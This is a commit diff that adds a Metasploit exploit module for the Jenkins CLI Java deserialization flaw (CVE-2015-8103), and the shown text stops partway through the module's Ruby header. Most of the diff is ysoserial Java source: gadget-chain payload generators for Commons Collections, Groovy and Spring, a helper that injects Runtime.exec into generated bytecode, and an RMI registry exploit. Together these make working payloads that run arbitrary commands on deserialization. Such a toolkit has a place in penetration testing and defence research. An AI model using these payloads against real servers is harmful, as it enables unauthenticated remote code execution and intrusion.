Add Jenkins CLI Java serialization exploit module

CVE-2015-8103

data/exploits/CVE-2015-8103/serialized_payload_header

@@ -0,0 +1 @@
+<===[JENKINS REMOTING CAPACITY]===>

external/source/exploits/CVE-2015-8103/Deserialize.java

@@ -0,0 +1,18 @@
+package ysoserial;
+
+import java.io.File;
+import java.io.FileInputStream;
+import java.io.IOException;
+import java.io.InputStream;
+
+import ysoserial.payloads.util.Serializables;
+
+/*
+ * for testing payloads across process boundaries
+ */
+public class Deserialize {
+	public static void main(final String[] args) throws ClassNotFoundException, IOException {
+		final InputStream in = args.length == 0 ? System.in : new FileInputStream(new File(args[0]));
+		Serializables.deserialize(in);
+	}
+}

external/source/exploits/CVE-2015-8103/ExecBlockingSecurityManager.java

@@ -0,0 +1,44 @@
+package ysoserial;
+
+import java.security.Permission;
+import java.util.concurrent.Callable;
+
+public class ExecBlockingSecurityManager extends SecurityManager {
+	@Override
+	public void checkPermission(final Permission perm) { }
+	
+	@Override
+	public void checkPermission(final Permission perm, final Object context) { }			
+	
+	public void checkExec(final String cmd) {
+		super.checkExec(cmd);
+		// throw a special exception to ensure we can detect exec() in the test
+		throw new ExecException(cmd);
+	};
+	
+	@SuppressWarnings("serial")
+	public static class ExecException extends RuntimeException {
+		private final String cmd;
+		public ExecException(String cmd) { this.cmd = cmd; }
+		public String getCmd() { return cmd; }		
+	}		
+	
+	public static void wrap(final Runnable runnable) throws Exception {
+		wrap(new Callable<Void>(){
+			public Void call() throws Exception {
+				runnable.run();
+				return null;
+			}			
+		});		
+	}
+	
+	public static <T> T wrap(final Callable<T> callable) throws Exception {
+		SecurityManager sm = System.getSecurityManager();
+		System.setSecurityManager(new ExecBlockingSecurityManager());
+		try {
+			return callable.call();
+		} finally {
+			System.setSecurityManager(sm);
+		}		
+	}
+}

external/source/exploits/CVE-2015-8103/GeneratePayload.java

@@ -0,0 +1,86 @@
+package ysoserial;
+
+import java.io.ObjectOutputStream;
+import java.util.ArrayList;
+import java.util.Collection;
+import java.util.Collections;
+import java.util.Comparator;
+import java.util.List;
+import java.util.Set;
+
+import org.reflections.Reflections;
+
+import ysoserial.payloads.ObjectPayload;
+
+@SuppressWarnings("rawtypes")
+public class GeneratePayload {
+
+	private static final int INTERNAL_ERROR_CODE = 70;
+	private static final int USAGE_CODE = 64;
+
+	public static void main(final String[] args) {
+		if (args.length != 2) {
+			printUsage();
+			System.exit(USAGE_CODE);
+		}
+		final String payloadType = args[0];
+		final String command = args[1];
+		
+		final Class<? extends ObjectPayload> payloadClass = getPayloadClass(payloadType);
+		if (payloadClass == null || !ObjectPayload.class.isAssignableFrom(payloadClass)) {
+			System.err.println("Invalid payload type '" + payloadType + "'");
+			printUsage();
+			System.exit(USAGE_CODE);
+		}
+		
+		try {
+			final ObjectPayload payload = payloadClass.newInstance();
+			final Object object = payload.getObject(command);
+			final ObjectOutputStream objOut = new ObjectOutputStream(System.out);
+			objOut.writeObject(object);
+		} catch (Throwable e) {
+			System.err.println("Error while generating or serializing payload");
+			e.printStackTrace();
+			System.exit(INTERNAL_ERROR_CODE);
+		}		
+		System.exit(0);		
+	}
+	
+	@SuppressWarnings("unchecked")
+	private static Class<? extends ObjectPayload> getPayloadClass(final String className) {
+		try {
+			return (Class<? extends ObjectPayload>) Class.forName(className);				
+		} catch (Exception e1) {		
+		}
+		try {
+			return (Class<? extends ObjectPayload>) Class.forName(GeneratePayload.class.getPackage().getName() 
+				+ ".payloads."  + className);
+		} catch (Exception e2) {				
+		}			
+		return null;		
+	}
+	
+	private static void printUsage() {
+		System.err.println("Y SO SERIAL?");
+		System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'");
+		System.err.println("\tAvailable payload types:");	
+		final List<Class<? extends ObjectPayload>> payloadClasses = 
+			new ArrayList<Class<? extends ObjectPayload>>(getPayloadClasses());
+		Collections.sort(payloadClasses, new ToStringComparator()); // alphabetize
+		for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
+			System.err.println("\t\t" + payloadClass.getSimpleName());
+		}
+	}
+	
+	// get payload classes by classpath scanning
+	private static Collection<Class<? extends ObjectPayload>> getPayloadClasses() {
+		final Reflections reflections = new Reflections(GeneratePayload.class.getPackage().getName());
+		final Set<Class<? extends ObjectPayload>> payloadTypes = reflections.getSubTypesOf(ObjectPayload.class);		
+		return payloadTypes;
+	}	
+
+	public static class ToStringComparator implements Comparator<Object> {
+		public int compare(Object o1, Object o2) { return o1.toString().compareTo(o2.toString()); }
+	}	
+
+}

external/source/exploits/CVE-2015-8103/RMIRegistryExploit.java

@@ -0,0 +1,53 @@
+package ysoserial;
+
+import java.rmi.Remote;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+import java.util.Arrays;
+import java.util.concurrent.Callable;
+
+import ysoserial.payloads.CommonsCollections1;
+import ysoserial.payloads.ObjectPayload;
+import ysoserial.payloads.util.Gadgets;
+
+/*
+ * Utility program for exploiting RMI registries running with required gadgets available in their ClassLoader.
+ * Attempts to exploit the registry itself, then enumerates registered endpoints and their interfaces.
+ * 
+ * TODO: automatic exploitation of endpoints, potentially with automated download and use of jars containing remote
+ * interfaces. See http://www.findmaven.net/api/find/class/org.springframework.remoting.rmi.RmiInvocationHandler .
+ */
+public class RMIRegistryExploit {
+	public static void main(final String[] args) throws Exception {
+		// ensure payload doesn't detonate during construction or deserialization 
+		ExecBlockingSecurityManager.wrap(new Callable<Void>(){public Void call() throws Exception {
+			Registry registry = LocateRegistry.getRegistry(args[0], Integer.parseInt(args[1]));		
+			String className = CommonsCollections1.class.getPackage().getName() +  "." + args[2];
+			Class<? extends ObjectPayload> payloadClass = (Class<? extends ObjectPayload>) Class.forName(className);
+			Object payload = payloadClass.newInstance().getObject(args[3]);
+			Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap("pwned", payload), Remote.class);
+			try {
+				registry.bind("pwned", remote);
+			} catch (Throwable e) {
+				e.printStackTrace();
+			}			
+			
+			try {
+				String[] names = registry.list();
+				for (String name : names) {
+					System.out.println("looking up '" + name + "'");
+					try {
+						Remote rem = registry.lookup(name);
+						System.out.println(Arrays.asList(rem.getClass().getInterfaces()));
+					} catch (Throwable e) {
+						e.printStackTrace();
+					}					
+				}
+			} catch (Throwable e) {
+				e.printStackTrace();
+			}
+			
+			return null;
+		}});
+	}
+}

external/source/exploits/CVE-2015-8103/payloads/ClassLoaderInvoker.java

@@ -0,0 +1,70 @@
+package ysoserial.payloads;
+
+import java.lang.reflect.InvocationHandler;
+import java.net.URL;
+import java.net.URLClassLoader;
+import java.util.HashMap;
+import java.util.Map;
+
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.map.LazyMap;
+
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.util.Gadgets;
+import ysoserial.payloads.util.PayloadRunner;
+import ysoserial.payloads.util.Reflections;
+
+/*								
+	Requires:
+		commons-collections
+ */
+@SuppressWarnings({"rawtypes", "unchecked"})
+@Dependencies({"commons-collections:commons-collections:3.1"})
+public class ClassLoaderInvoker extends PayloadRunner implements ObjectPayload<InvocationHandler> {
+	
+	public InvocationHandler getObject(final String command) throws Exception {
+		final String fileName = command.split(" ")[0];
+		final String clazzName = command.split(" ")[1];
+		final URL[] urlArray = new URL[]{ new URL("file://" + fileName)};
+		// inert chain for setup
+		final Transformer transformerChain = new ChainedTransformer(
+			new Transformer[]{ new ConstantTransformer(1) });
+		// real chain for after setup
+		final Transformer[] transformers = new Transformer[] {
+				new ConstantTransformer(URLClassLoader.class),
+				new InvokerTransformer("getMethod", new Class[] {
+						String.class, Class[].class }, new Object[] {
+						"newInstance", new Class[]{ URL[].class }}),
+				new InvokerTransformer("invoke", new Class[] {
+						Object.class, Object[].class }, new Object[] {
+						null, new Object[]{ urlArray } }),
+				new InvokerTransformer("loadClass", new Class[] {
+					String.class}, new Object[] { clazzName }),
+				new InvokerTransformer("getMethod", new Class[] {
+						String.class, Class[].class }, new Object[] {
+						"main", new Class[]{String[].class} }),
+				new InvokerTransformer("invoke", new Class[] {
+					Object.class, Object[].class }, new Object[] {
+					null, new Object[]{ new String[]{} } }),
+				new ConstantTransformer(1) };
+
+		final Map innerMap = new HashMap();
+
+		final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
+		
+		final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
+		
+		final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
+		
+		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain	
+				
+		return handler;
+	}
+	
+	public static void main(final String[] args) throws Exception {
+		PayloadRunner.run(ClassLoaderInvoker.class, args);
+	}
+}

external/source/exploits/CVE-2015-8103/payloads/CommonsCollections1.java

@@ -0,0 +1,78 @@
+package ysoserial.payloads;
+
+import java.lang.reflect.InvocationHandler;
+import java.util.HashMap;
+import java.util.Map;
+
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.map.LazyMap;
+
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.util.Gadgets;
+import ysoserial.payloads.util.PayloadRunner;
+import ysoserial.payloads.util.Reflections;
+
+/*
+	Gadget chain:	
+		ObjectInputStream.readObject()
+			AnnotationInvocationHandler.readObject()
+				Map(Proxy).entrySet()
+					AnnotationInvocationHandler.invoke()
+						LazyMap.get()
+							ChainedTransformer.transform()
+								ConstantTransformer.transform()
+								InvokerTransformer.transform()
+									Method.invoke()				
+										Class.getMethod()
+								InvokerTransformer.transform()
+									Method.invoke()
+										Runtime.getRuntime()
+								InvokerTransformer.transform()
+									Method.invoke()
+										Runtime.exec()										
+	
+	Requires:
+		commons-collections
+ */
+@SuppressWarnings({"rawtypes", "unchecked"})
+@Dependencies({"commons-collections:commons-collections:3.1"})
+public class CommonsCollections1 extends PayloadRunner implements ObjectPayload<InvocationHandler> {
+	
+	public InvocationHandler getObject(final String command) throws Exception {
+		final String[] execArgs = new String[] { command };
+		// inert chain for setup
+		final Transformer transformerChain = new ChainedTransformer(
+			new Transformer[]{ new ConstantTransformer(1) });
+		// real chain for after setup
+		final Transformer[] transformers = new Transformer[] {
+				new ConstantTransformer(Runtime.class),
+				new InvokerTransformer("getMethod", new Class[] {
+					String.class, Class[].class }, new Object[] {
+					"getRuntime", new Class[0] }),
+				new InvokerTransformer("invoke", new Class[] {
+					Object.class, Object[].class }, new Object[] {
+					null, new Object[0] }),
+				new InvokerTransformer("exec",
+					new Class[] { String.class }, execArgs),
+				new ConstantTransformer(1) };
+
+		final Map innerMap = new HashMap();
+
+		final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
+		
+		final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
+		
+		final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
+		
+		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain	
+				
+		return handler;
+	}
+	
+	public static void main(final String[] args) throws Exception {
+		PayloadRunner.run(CommonsCollections1.class, args);
+	}
+}

external/source/exploits/CVE-2015-8103/payloads/CommonsCollections2.java

@@ -0,0 +1,57 @@
+package ysoserial.payloads;
+
+import java.util.PriorityQueue;
+import java.util.Queue;
+
+import org.apache.commons.collections4.comparators.TransformingComparator;
+import org.apache.commons.collections4.functors.InvokerTransformer;
+
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.util.Gadgets;
+import ysoserial.payloads.util.PayloadRunner;
+import ysoserial.payloads.util.Reflections;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+
+/*
+	Gadget chain:	
+		ObjectInputStream.readObject()
+			PriorityQueue.readObject()
+				...
+					TransformingComparator.compare()
+						InvokerTransformer.transform()
+							Method.invoke()
+								Runtime.exec()
+ */
+
+@SuppressWarnings({ "rawtypes", "unchecked", "restriction" })
+@Dependencies({"org.apache.commons:commons-collections4:4.0"})
+public class CommonsCollections2 implements ObjectPayload<Queue<Object>> { 
+
+	public Queue<Object> getObject(final String command) throws Exception {		
+		final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
+		// mock method name until armed
+		final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
+		
+		// create queue with numbers and basic comparator
+		final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer)); 
+		// stub data for replacement later
+		queue.add(1); 
+		queue.add(1); 
+		
+		// switch method called by comparator
+		Reflections.setFieldValue(transformer, "iMethodName", "newTransformer"); 
+		
+		// switch contents of queue
+		final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
+		queueArray[0] = templates;
+		queueArray[1] = 1;
+		
+		return queue;
+	}
+	
+	public static void main(final String[] args) throws Exception {
+		PayloadRunner.run(CommonsCollections2.class, args);
+	}
+
+}

external/source/exploits/CVE-2015-8103/payloads/CommonsCollections3.java

@@ -0,0 +1,81 @@
+package ysoserial.payloads;
+
+import java.io.File;
+import java.io.FileInputStream;
+import java.lang.reflect.InvocationHandler;
+import java.util.HashMap;
+import java.util.Map;
+
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.map.LazyMap;
+import org.apache.commons.io.FileUtils;
+
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.util.Gadgets;
+import ysoserial.payloads.util.PayloadRunner;
+import ysoserial.payloads.util.Reflections;
+
+/*
+	Gadget chain:	
+		ObjectInputStream.readObject()
+			AnnotationInvocationHandler.readObject()
+				Map(Proxy).entrySet()
+					AnnotationInvocationHandler.invoke()
+						LazyMap.get()
+							ChainedTransformer.transform()
+								ConstantTransformer.transform()
+								InvokerTransformer.transform()
+									Method.invoke()				
+										Class.getMethod()
+								InvokerTransformer.transform()
+									Method.invoke()
+										Runtime.getRuntime()
+								InvokerTransformer.transform()
+									Method.invoke()
+										Runtime.exec()										
+	
+	Requires:
+		commons-collections
+ */
+@SuppressWarnings({"rawtypes", "unchecked"})
+@Dependencies({"commons-collections:commons-collections:3.1"})
+public class CommonsCollections3 extends PayloadRunner implements ObjectPayload<InvocationHandler> {
+	
+	public InvocationHandler getObject(final String command) throws Exception {
+		final File f = new File("/tmp/ysocereal.jar");
+        final byte[] bFile = FileUtils.readFileToByteArray(new File("/tmp/pwned.jar"));
+		
+		// inert chain for setup
+		final Transformer transformerChain = new ChainedTransformer(
+			new Transformer[]{ new ConstantTransformer(1) });
+		// real chain for after setup
+		final Transformer[] transformers = new Transformer[] {
+				new ConstantTransformer(FileUtils.class),
+				new InvokerTransformer("getMethod", new Class[] {
+					String.class, Class[].class }, new Object[] {
+					"writeByteArrayToFile", new Class[]{File.class, byte[].class} }),
+				new InvokerTransformer("invoke", new Class[] {
+					Object.class, Object[].class }, new Object[] {
+					null, new Object[]{f,bFile} }),
+				new ConstantTransformer(1) };
+
+		final Map innerMap = new HashMap();
+
+		final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
+		
+		final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
+		
+		final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
+		
+		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain	
+				
+		return handler;
+	}
+	
+	public static void main(final String[] args) throws Exception {
+		PayloadRunner.run(CommonsCollections3.class, args);
+	}
+}

external/source/exploits/CVE-2015-8103/payloads/Groovy1.java

@@ -0,0 +1,45 @@
+package ysoserial.payloads;
+
+import java.lang.reflect.InvocationHandler;
+import java.util.Map;
+
+import org.codehaus.groovy.runtime.ConvertedClosure;
+import org.codehaus.groovy.runtime.MethodClosure;
+
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.util.Gadgets;
+import ysoserial.payloads.util.PayloadRunner;
+
+/*
+	Gadget chain:	
+		ObjectInputStream.readObject()
+			PriorityQueue.readObject()
+				Comparator.compare() (Proxy)
+					ConvertedClosure.invoke()
+						MethodClosure.call()
+							...
+						  		Method.invoke()
+									Runtime.exec()
+	
+	Requires:
+		groovy
+ */
+
+@SuppressWarnings({ "rawtypes", "unchecked" })
+@Dependencies({"org.codehaus.groovy:groovy:2.3.9"})
+public class Groovy1 extends PayloadRunner implements ObjectPayload<InvocationHandler> {
+
+	public InvocationHandler getObject(final String command) throws Exception {
+		final ConvertedClosure closure = new ConvertedClosure(new MethodClosure(command, "execute"), "entrySet");
+		
+		final Map map = Gadgets.createProxy(closure, Map.class);		
+
+		final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(map);
+		
+		return handler;
+	}
+
+	public static void main(final String[] args) throws Exception {
+		PayloadRunner.run(Groovy1.class, args);
+	}	
+}

external/source/exploits/CVE-2015-8103/payloads/ObjectPayload.java

@@ -0,0 +1,9 @@
+package ysoserial.payloads;
+
+public interface ObjectPayload<T> {
+	/*
+	 * return armed payload object to be serialized that will execute specified 
+	 * command on deserialization
+	 */
+	public T getObject(String command) throws Exception;
+}

external/source/exploits/CVE-2015-8103/payloads/Spring1.java

@@ -0,0 +1,78 @@
+package ysoserial.payloads;
+
+import static java.lang.Class.forName;
+
+import java.lang.reflect.Constructor;
+import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Type;
+
+import javax.xml.transform.Templates;
+
+import org.springframework.beans.factory.ObjectFactory;
+
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.util.Gadgets;
+import ysoserial.payloads.util.PayloadRunner;
+import ysoserial.payloads.util.Reflections;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+
+/*
+	Gadget chain:
+	
+		ObjectInputStream.readObject()
+			SerializableTypeWrapper.MethodInvokeTypeProvider.readObject()
+				SerializableTypeWrapper.TypeProvider(Proxy).getType()
+					AnnotationInvocationHandler.invoke()
+						HashMap.get()
+				ReflectionUtils.findMethod()
+				SerializableTypeWrapper.TypeProvider(Proxy).getType()
+					AnnotationInvocationHandler.invoke()
+						HashMap.get()			
+				ReflectionUtils.invokeMethod()
+					Method.invoke()	
+						Templates(Proxy).newTransformer()
+							AutowireUtils.ObjectFactoryDelegatingInvocationHandler.invoke()
+								ObjectFactory(Proxy).getObject()
+									AnnotationInvocationHandler.invoke()
+										HashMap.get()	
+								Method.invoke()
+									TemplatesImpl.newTransformer()
+										TemplatesImpl.getTransletInstance()
+											TemplatesImpl.defineTransletClasses()
+												TemplatesImpl.TransletClassLoader.defineClass()
+													Pwner*(Javassist-generated).<static init>
+														Runtime.exec()
+
+ */
+
+@SuppressWarnings({"restriction", "rawtypes"})
+@Dependencies({"org.springframework:spring-core:4.1.4.RELEASE","org.springframework:spring-beans:4.1.4.RELEASE"})
+public class Spring1 extends PayloadRunner implements ObjectPayload<Object> {
+	
+	public Object getObject(final String command) throws Exception {
+		final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
+		
+		final ObjectFactory objectFactoryProxy = 
+				Gadgets.createMemoitizedProxy(Gadgets.createMap("getObject", templates), ObjectFactory.class);
+		
+		final Type typeTemplatesProxy = Gadgets.createProxy((InvocationHandler) 
+				Reflections.getFirstCtor("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler")
+					.newInstance(objectFactoryProxy), Type.class, Templates.class);
+		
+		final Object typeProviderProxy = Gadgets.createMemoitizedProxy(
+				Gadgets.createMap("getType", typeTemplatesProxy), 
+				forName("org.springframework.core.SerializableTypeWrapper$TypeProvider"));
+		
+		final Constructor mitpCtor = Reflections.getFirstCtor("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider");
+		final Object mitp = mitpCtor.newInstance(typeProviderProxy, Object.class.getMethod("getClass", new Class[] {}), 0);
+		Reflections.setFieldValue(mitp, "methodName", "newTransformer");
+
+		return mitp;
+	}
+
+	public static void main(final String[] args) throws Exception {
+		PayloadRunner.run(Spring1.class, args);
+	}
+
+}

external/source/exploits/CVE-2015-8103/payloads/annotation/Dependencies.java

@@ -0,0 +1,12 @@
+package ysoserial.payloads.annotation;
+
+import java.lang.annotation.ElementType;
+import java.lang.annotation.Retention;
+import java.lang.annotation.RetentionPolicy;
+import java.lang.annotation.Target;
+
+@Target(ElementType.TYPE)
+@Retention(RetentionPolicy.RUNTIME)
+public @interface Dependencies {
+	String[] value() default {};
+}

external/source/exploits/CVE-2015-8103/payloads/util/ClassFiles.java

@@ -0,0 +1,44 @@
+package ysoserial.payloads.util;
+
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+
+public class ClassFiles {
+	public static String classAsFile(final Class<?> clazz) {
+		return classAsFile(clazz, true);
+	}
+	
+	public static String classAsFile(final Class<?> clazz, boolean suffix) {
+		String str;
+		if (clazz.getEnclosingClass() == null) {
+			str = clazz.getName().replace(".", "/");
+		} else {
+			str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName();
+		}
+		if (suffix) {
+			str += ".class";			
+		}
+		return str;  
+	}
+
+	public static byte[] classAsBytes(final Class<?> clazz) {
+		try {
+			final byte[] buffer = new byte[1024];
+			final String file = classAsFile(clazz);
+			final InputStream in = ClassFiles.class.getClassLoader().getResourceAsStream(file);
+			if (in == null) {
+				throw new IOException("couldn't find '" + file + "'");
+			}
+			final ByteArrayOutputStream out = new ByteArrayOutputStream();
+			int len;
+			while ((len = in.read(buffer)) != -1) {
+				out.write(buffer, 0, len);
+			}
+			return out.toByteArray();
+		} catch (IOException e) {
+			throw new RuntimeException(e);
+		}
+	}
+	
+}

external/source/exploits/CVE-2015-8103/payloads/util/Gadgets.java

@@ -0,0 +1,92 @@
+package ysoserial.payloads.util;
+
+import java.io.Serializable;
+import java.lang.reflect.Array;
+import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Proxy;
+import java.util.HashMap;
+import java.util.Map;
+
+import javassist.ClassClassPath;
+import javassist.ClassPool;
+import javassist.CtClass;
+
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+
+/*
+ * utility generator functions for common jdk-only gadgets
+ */
+@SuppressWarnings("restriction")
+public class Gadgets {
+	private static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler";	
+	
+	public static class StubTransletPayload extends AbstractTranslet implements Serializable {
+		private static final long serialVersionUID = -5971610431559700674L;
+
+		public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}
+
+		@Override
+		public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}	
+	}
+
+	// required to make TemplatesImpl happy
+	public static class Foo implements Serializable {
+		private static final long serialVersionUID = 8207363842866235160L; 		
+	}
+
+	public static <T> T createMemoitizedProxy(final Map<String,Object> map, final Class<T> iface, 
+		final Class<?> ... ifaces) throws Exception {	    
+	    return createProxy(createMemoizedInvocationHandler(map), iface, ifaces);	    
+	}
+
+	public static InvocationHandler createMemoizedInvocationHandler(final Map<String, Object> map) throws Exception {
+		return (InvocationHandler) Reflections.getFirstCtor(ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
+	}
+	
+	public static <T> T createProxy(final InvocationHandler ih, final Class<T> iface, final Class<?> ... ifaces) {
+		final Class<?>[] allIfaces = (Class<?>[]) Array.newInstance(Class.class, ifaces.length + 1);
+		allIfaces[0] = iface;
+		if (ifaces.length > 0) {
+			System.arraycopy(ifaces, 0, allIfaces, 1, ifaces.length);	
+		}		
+		return iface.cast(Proxy.newProxyInstance(Gadgets.class.getClassLoader(), allIfaces , ih));
+	}
+
+	public static Map<String,Object> createMap(final String key, final Object val) {
+		final Map<String,Object> map = new HashMap<String, Object>();
+		map.put(key,val);
+		return map;
+	}
+
+	public static TemplatesImpl createTemplatesImpl(final String command) throws Exception {
+		final TemplatesImpl templates = new TemplatesImpl();		
+		
+		// use template gadget class
+		ClassPool pool = ClassPool.getDefault();
+		pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
+		final CtClass clazz = pool.get(StubTransletPayload.class.getName());
+		// run command in static initializer
+		// TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
+		clazz.makeClassInitializer().insertAfter("java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\"", "\\\"") +"\");");
+		// sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
+		clazz.setName("ysoserial.Pwner" + System.nanoTime());		
+		
+		final byte[] classBytes = clazz.toBytecode();
+		
+		// inject class bytes into instance
+		Reflections.setFieldValue(templates, "_bytecodes", new byte[][] {
+			classBytes,
+			ClassFiles.classAsBytes(Foo.class)});
+		
+		// required to make TemplatesImpl happy
+		Reflections.setFieldValue(templates, "_name", "Pwnr"); 			
+		Reflections.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
+		return templates;
+	}
+}

external/source/exploits/CVE-2015-8103/payloads/util/PayloadRunner.java

@@ -0,0 +1,40 @@
+package ysoserial.payloads.util;
+
+import static ysoserial.payloads.util.Serializables.deserialize;
+import static ysoserial.payloads.util.Serializables.serialize;
+
+import java.util.concurrent.Callable;
+
+import ysoserial.ExecBlockingSecurityManager;
+import ysoserial.payloads.ObjectPayload;
+
+/*
+ * utility class for running exploits locally from command line
+ */
+@SuppressWarnings("unused")
+public class PayloadRunner {
+	public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {		
+		// ensure payload generation doesn't throw an exception
+		byte[] serialized = ExecBlockingSecurityManager.wrap(new Callable<byte[]>(){
+			public byte[] call() throws Exception {
+				final String command = args.length > 0 && args[0] != null ? args[0] : "calc.exe";
+				
+				System.out.println("generating payload object(s) for command: '" + command + "'");
+				
+				final Object objBefore = clazz.newInstance().getObject(command);
+				
+				System.out.println("serializing payload");
+				
+				return serialize(objBefore);
+		}});			
+			
+		try {	
+			System.out.println("deserializing payload");			
+			final Object objAfter = deserialize(serialized);			
+		} catch (Exception e) {
+			e.printStackTrace();
+		}
+
+	}	
+	
+}

external/source/exploits/CVE-2015-8103/payloads/util/Reflections.java

@@ -0,0 +1,33 @@
+package ysoserial.payloads.util;
+
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+
+public class Reflections {
+
+	public static Field getField(final Class<?> clazz, final String fieldName) throws Exception {
+		Field field = clazz.getDeclaredField(fieldName);
+		if (field == null && clazz.getSuperclass() != null) {
+			field = getField(clazz.getSuperclass(), fieldName);
+		}
+		field.setAccessible(true);
+		return field;
+	}
+
+	public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
+		final Field field = getField(obj.getClass(), fieldName);
+		field.set(obj, value);
+	}
+
+	public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
+		final Field field = getField(obj.getClass(), fieldName);		
+		return field.get(obj);
+	}
+
+	public static Constructor<?> getFirstCtor(final String name) throws Exception {
+		final Constructor<?> ctor = Class.forName(name).getDeclaredConstructors()[0];
+	    ctor.setAccessible(true);
+	    return ctor;
+	}
+
+}

external/source/exploits/CVE-2015-8103/payloads/util/Serializables.java

@@ -0,0 +1,34 @@
+package ysoserial.payloads.util;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.io.OutputStream;
+
+public class Serializables {
+
+	public static byte[] serialize(final Object obj) throws IOException {
+		final ByteArrayOutputStream out = new ByteArrayOutputStream();
+		serialize(obj, out);
+		return out.toByteArray();
+	}
+
+	public static void serialize(final Object obj, final OutputStream out) throws IOException {
+		final ObjectOutputStream objOut = new ObjectOutputStream(out);
+		objOut.writeObject(obj);				
+	}
+	
+	public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
+		final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
+		return deserialize(in);
+	}
+	
+	public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
+		final ObjectInputStream objIn = new ObjectInputStream(in);
+		return objIn.readObject();
+	}
+	
+}

modules/exploits/linux/misc/jenkins_java_deserialize.rb

@@ -0,0 +1,213 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Jenkins CLI RMI Java Deserialization Vulnerability',
+      'Description'    => %q{
+        This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on
+        the Jenkins master, which allows remote arbitrary code execution. Authentication is not
+        required to exploit this vulnerability.
+      },
+      'Author'         =>
+          [
+            'Christopher Frohoff', # Vulnerability discovery
+            'Steve Breen',         # Public Exploit
+            'Dev Mohanty',         # Metasploit module
+            'Louis Sato',          # Metasploit
+            'William Vu',          # Metasploit
+            'juan vazquez',        # Metasploit
+            'Wei Chen'             # Metasploit
+          ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
